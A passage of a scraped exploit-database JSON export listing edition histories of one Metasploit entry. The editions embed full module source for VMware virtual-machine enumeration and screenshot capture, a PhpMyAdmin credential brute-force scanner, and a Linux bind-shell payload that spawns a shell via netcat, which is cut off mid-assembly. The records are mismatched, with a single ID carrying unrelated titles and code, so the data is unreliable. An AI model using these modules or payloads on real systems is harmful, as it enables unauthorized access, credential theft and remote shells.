"9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-28T21:10:46", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-05-28T21:10:46"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1031224287377204291", "KITPLOIT:3810690323768462521"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8"]}, {"type": "threatpost", "idList": ["THREATPOST:BDEA819E4532E0D1FA016778F659F7E8"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140108", "OPENVAS:1361412562310140090", "OPENVAS:1361412562310891815", "OPENVAS:1361412562310108592", "OPENVAS:1361412562310140160", "OPENVAS:1361412562310140095", "OPENVAS:1361412562310876460", "OPENVAS:1361412562310891814", "OPENVAS:1361412562310844043", "OPENVAS:1361412562310876458"]}, {"type": "zdt", "idList": ["1337DAY-ID-32847"]}, {"type": "cve", "idList": ["CVE-2019-5525", "CVE-2019-5522"]}], "modified": "2019-05-28T21:10:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T21:10:46", "differentElements": ["sourceData"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "3158100985ba9b2b5d046de8ce2105f5", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-18T21:03:54", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-05-28T21:10:46"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:1031224287377204291", "KITPLOIT:3810690323768462521"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8"]}, {"type": "threatpost", "idList": ["THREATPOST:BDEA819E4532E0D1FA016778F659F7E8"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140108", "OPENVAS:1361412562310140090", "OPENVAS:1361412562310891815", "OPENVAS:1361412562310108592", "OPENVAS:1361412562310140160", "OPENVAS:1361412562310140095", "OPENVAS:1361412562310876460", "OPENVAS:1361412562310891814", "OPENVAS:1361412562310844043", "OPENVAS:1361412562310876458"]}, {"type": "zdt", "idList": ["1337DAY-ID-32847"]}, {"type": "cve", "idList": ["CVE-2019-5525", "CVE-2019-5522"]}], "modified": "2019-05-28T21:10:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-18T21:03:54", "differentElements": ["sourceData"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-19T03:25:42", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-06-19T03:25:42"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:998955151150716619", "KITPLOIT:8104288151939526503"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891823", "OPENVAS:1361412562310891820", "OPENVAS:1361412562310704465", "OPENVAS:1361412562310891821", "OPENVAS:1361412562310108600", "OPENVAS:1361412562310704464", "OPENVAS:1361412562310113410", "OPENVAS:1361412562310108597", "OPENVAS:1361412562310108598", "OPENVAS:1361412562310108601"]}], "modified": "2019-06-19T03:25:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-19T03:25:42", "differentElements": ["sourceData"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "3158100985ba9b2b5d046de8ce2105f5", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-27T22:37:27", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2019-06-19T03:25:42"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:998955151150716619", "KITPLOIT:8104288151939526503"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891823", "OPENVAS:1361412562310891820", "OPENVAS:1361412562310704465", "OPENVAS:1361412562310891821", "OPENVAS:1361412562310108600", "OPENVAS:1361412562310704464", "OPENVAS:1361412562310113410", "OPENVAS:1361412562310108597", "OPENVAS:1361412562310108598", "OPENVAS:1361412562310108601"]}], "modified": "2019-06-19T03:25:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T22:37:27", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-28T04:53:43", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-06-28T04:53:43"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310142513", "OPENVAS:1361412562310142515", "OPENVAS:1361412562310844073", "OPENVAS:1361412562310112436", "OPENVAS:1361412562310876535", "OPENVAS:1361412562310844072", "OPENVAS:1361412562310876536", "OPENVAS:1361412562310852586", "OPENVAS:1361412562310876534", "OPENVAS:1361412562310142506"]}, {"type": "zdt", "idList": ["1337DAY-ID-32902"]}], "modified": "2019-06-28T04:53:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-28T04:53:43", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 20}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "1762da5c3fc42114b1e29df64ead154f", "type": "metasploit", "bulletinFamily": "exploit", "title": "PhpMyAdmin Login Scanner", "description": "This module will attempt to authenticate to PhpMyAdmin.\n", "published": "2018-07-24T14:47:01", "modified": "2019-06-27T22:06:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-02T16:31:49", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2019-07-02T16:31:49"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:2BD68EA7A6F1DB646F87AC8DC550B295"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891842", "OPENVAS:1361412562310114102", "OPENVAS:1361412562310114103", "OPENVAS:1361412562310112497", "OPENVAS:1361412562310113420", "OPENVAS:1361412562310112596", "OPENVAS:1361412562310891840", "OPENVAS:1361412562310113422", "OPENVAS:1361412562310113419", "OPENVAS:1361412562310142523"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1E942C9D1652BF3125EC658A99E330D6"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:B5C8E8A2FC680359AF328D2812F2833C"]}], "modified": "2019-07-02T16:31:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/phpmyadmin_login.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/phpmyadmin'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'PhpMyAdmin Login Scanner',\n 'Description' => %q{\n This module will attempt to authenticate to PhpMyAdmin.\n },\n 'Author' => [ 'Shelby Pace' ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' =>\n {\n 'RPORT' => 80,\n 'USERNAME' => 'root'\n }\n ))\n\n register_options(\n [\n OptString.new('USERNAME', [true, 'The username to PhpMyAdmin', 'root']),\n OptString.new('PASSWORD', [false, 'The password to PhpMyAdmin', '']),\n OptString.new('TARGETURI', [true, 'The path to PhpMyAdmin', '/index.php'])\n ])\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n def scanner(ip)\n @scanner ||= lambda {\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n return Metasploit::Framework::LoginScanner::PhpMyAdmin.new(\n configure_http_login_scanner(\n host: ip,\n port: datastore['RPORT'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n uri: normalize_uri(datastore['TARGETURI']),\n connection_timeout: 5\n ))\n }.call\n end\n\n def report_bad_cred(ip, rport, result)\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n end\n\n def run_host(ip)\n phpmyadmin_res = scanner(ip).check_setup\n unless phpmyadmin_res\n print_brute(:level => :error, :ip => ip, :msg => \"PhpMyAdmin is not available\")\n return\n end\n\n print_status(\"PhpMyAdmin Version: #{phpmyadmin_res}\")\n\n scanner(ip).scan! do |result|\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(:level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\")\n store_valid_credential(\n user: result.credential.public,\n private: result.credential.private,\n private_type: :password,\n proof: result.proof,\n service_data: {\n address: ip,\n port: rport,\n service_name: 'http',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n )\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)\n report_bad_cred(ip, rport, result)\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(:level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\")\n report_bad_cred(ip, rport, result)\n end\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-02T16:31:49", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 21}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "9d7a7d8edeaa1315f1ef875946b94a2a", "type": "metasploit", "bulletinFamily": "exploit", "title": "VMWare Enumerate Virtual Machines", "description": "This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.\n", "published": "2012-02-13T18:07:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-02T20:18:22", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-07-02T20:18:22"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:2BD68EA7A6F1DB646F87AC8DC550B295"]}, {"type": "zdt", "idList": ["1337DAY-ID-32941", "1337DAY-ID-32947", "1337DAY-ID-32949", "1337DAY-ID-32946", "1337DAY-ID-32945", "1337DAY-ID-32924"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891842", "OPENVAS:1361412562310114102", "OPENVAS:1361412562310114103", "OPENVAS:1361412562310112497", "OPENVAS:1361412562310113419", "OPENVAS:1361412562310113422", "OPENVAS:1361412562310113420", "OPENVAS:1361412562310112596", "OPENVAS:1361412562310891840", "OPENVAS:1361412562310113421"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1E942C9D1652BF3125EC658A99E330D6"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:B5C8E8A2FC680359AF328D2812F2833C"]}], "modified": "2019-07-02T20:18:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/vmware/vmware_enum_vms.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::VIMSoap\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'VMWare Enumerate Virtual Machines',\n 'Description' => %Q{\n This module attempts to discover virtual machines on any VMWare instance\n running the web interface. This would include ESX/ESXi and VMWare Server.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'SSL' => true }\n )\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [ true, \"The username to Authenticate with.\", 'root' ]),\n OptString.new('PASSWORD', [ true, \"The password to Authenticate with.\", 'password' ]),\n OptBool.new('SCREENSHOT', [true, \"Wheter or not to try to take a screenshot\", true])\n ])\n end\n\n def run_host(ip)\n\n if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success\n virtual_machines = vim_get_vms\n virtual_machines.each do |vm|\n print_good YAML.dump(vm)\n report_note(\n :host => rhost,\n :type => \"vmware.esx.vm\",\n :data => vm,\n :port => rport,\n :proto => 'tcp',\n :update => :unique_data\n )\n next unless datastore['SCREENSHOT'] and vm['runtime']['powerState'] == 'poweredOn'\n print_status \"Attempting to take screenshot of #{vm['name']}....\"\n screenshot = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n case screenshot\n when :error\n print_error \"Screenshot failed\"\n next\n when :expired\n vim_do_login(datastore['USERNAME'], datastore['PASSWORD'])\n retry_result = vim_take_screenshot(vm, datastore['USERNAME'], datastore['PASSWORD'] )\n if retry_result == :error or retry_result == :expired\n print_error \"Screenshot failed\"\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], retry_result, \"#{vm['name']}_screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n else\n ss_path = store_loot(\"host.vmware.screenshot\", \"image/png\", datastore['RHOST'], screenshot, \"screenshot.png\", \"Screenshot of VM #{vm['name']}\")\n print_good \"Screenshot Saved to #{ss_path}\"\n end\n end\n\n f = store_loot('host.vmware.vms', \"text/plain\", datastore['RHOST'], YAML.dump(virtual_machines) , \"#{datastore['RHOST']}_esx_vms.txt\", \"VMWare ESX Virtual Machines\")\n vprint_good(\"VM info stored in: #{f}\")\n else\n print_error \"Login Failure on #{ip}\"\n return\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-02T20:18:22", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 22}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_ENUM_VMS", "hash": "b2e1238071e642bef24eefc3090b97c4", "type": "metasploit", "bulletinFamily": "exploit", "title": "Linux Command Shell, Bind TCP Random Port Inline", "description": "Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.\n", "published": "2013-09-10T22:20:48", "modified": "2019-05-17T10:12:01", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm"], "cvelist": [], "lastseen": "2019-07-04T06:12:29", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-07-02T20:18:22"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:2BD68EA7A6F1DB646F87AC8DC550B295"]}, {"type": "zdt", "idList": ["1337DAY-ID-32941", "1337DAY-ID-32947", "1337DAY-ID-32949", "1337DAY-ID-32946", "1337DAY-ID-32945", "1337DAY-ID-32924"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891842", "OPENVAS:1361412562310114102", "OPENVAS:1361412562310114103", "OPENVAS:1361412562310112497", "OPENVAS:1361412562310113419", "OPENVAS:1361412562310113422", "OPENVAS:1361412562310113420", "OPENVAS:1361412562310112596", "OPENVAS:1361412562310891840", "OPENVAS:1361412562310113421"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1E942C9D1652BF3125EC658A99E330D6"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:B5C8E8A2FC680359AF328D2812F2833C"]}], "modified": "2019-07-02T20:18:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nmodule MetasploitModule\n\n CachedSize = 57\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',\n 'Description' => %q{\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.\n },\n 'Author' => ['Geyslan G. Bem <geyslan[at]gmail.com>',\n 'Aleh Boitsau <infosecurity[at]ya.ru>'],\n 'License' => BSD_LICENSE,\n 'References' => [ ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],\n ['EDB', '41631'] ],\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86\n ))\n end\n\n def generate\n unless self.available_space.nil? || self.available_space >= 57\n payload = <<-EOS\n preparation:\n xor edx, edx ;zeroed edx\n push edx ;push NULL into stack\n push 0x68732f2f ;-le//bin//sh\n push 0x6e69622f\n push 0x2f656c2d\n mov edi, esp ;store a pointer to -le//bin//sh into edi\n push edx ;push NULL into stack\n push 0x636e2f2f ;/bin//nc\n push 0x6e69622f\n mov ebx, esp ;store a pointer to filename (/bin//nc) into ebx\n\n execve_call:\n push edx ;push NULL into stack\n push edi ;pointer to -le//bin//sh\n push ebx ;pointer to filename (/bin//nc)\n mov ecx, esp ;argv[]\n xor eax, eax ;zeroed eax\n mov al,11 ;define execve()\n int 0x80 ;run syscall\n EOS\n else\n payload = <<-EOS\n ; Avoiding garbage\n xor ebx, ebx\n mul ebx\n\n ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)\n mov al, 102\t\t; syscall 102 - socketcall\n inc ebx\t\t\t; socketcall type (sys_socket 1)\n\n push edx\t\t; IPPROTO_IP = 0 (int)\n push ebx\t\t; SOCK_STREAM = 1 (int)\n push 2\t\t\t; AF_INET = 2 (int)\n mov ecx, esp\t\t; ptr to argument array\n int 0x80\t\t; kernel interrupt\n\n ; int listen(int sockfd, int backlog);\n ; listen(sockfd, int);\n\n ; listen arguments\n push edx\t\t; put zero\n push eax\t\t; put the file descriptor returned by socket()\n mov ecx, esp\t\t; ptr to argument array\n\n mov al, 102\t\t; syscall 102 - socketcall\n mov bl, 4\t\t; socketcall type (sys_listen 4)\n int 0x80\t\t; kernel interrupt\n\n ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\n ; accept(sockfd, NULL, NULL)\n\n mov al, 102\t\t; syscall 102 - socketcall\n inc ebx\t\t\t; socketcall type (sys_accept 5)\n int 0x80\t\t; kernel interrupt\n\n ; int dup2(int oldfd, int 